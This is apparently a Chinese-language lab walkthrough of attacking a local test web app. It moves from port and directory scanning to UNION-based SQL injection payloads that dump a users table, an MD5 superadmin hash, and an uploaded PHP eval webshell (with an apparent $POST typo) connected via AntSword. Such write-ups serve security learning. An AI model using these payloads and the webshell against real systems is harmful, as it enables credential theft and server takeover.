一.端口扫描
用工具扫描出他的端口 可以看到我们的端口是192.168.133.165

二.目录扫描
使用dirsearch工具扫描目录
dirsearch -u http://192.168.133.165/


三.漏洞挖掘
我们打开网页的后台管理 点击右下方 注册账号
创建完成后登录你所创建的用户 来到这个页面 单机 search 出现书单

1.验证sql注入
1' and 1=1#


存在SQL注入,使用sqlmap工具注入后面的
2.判断字段
1' order by 3 #
说明字段数是3

3.查看数据库
-1' union select database(),2,3 #

4.查看数据库表名
看到数据库中存在books表和users表;猜测users表包含账户信息
-1' union select group_concat(table_name),2,3 from information_schema.tables where table_schema='webapphacking' #

5.查看users表所有的列
-1' union select group_concat(column_name),2,3 from information_schema.columns where table_name='users' #

6.查看数据
看到超级用户跟相应密码 可是密码是加密得需要MD5解密

选择superadmin对应的密码 2386acb2cf356944177746fc92523983
使用md5解密 解密后的密码 如下图

7.登录进去
然后我们去登陆 超级用户

进去可以看到上传文件,在上传一句话木马
<?php @eval ($POST[cmd]);?>
然后去访问我们传进去的一句话木马的 文件 shell.php
8.最后用蚁剑连接 就成功进去了

好了成功!!拿到shell了
321

被折叠的 条评论
为什么被折叠?



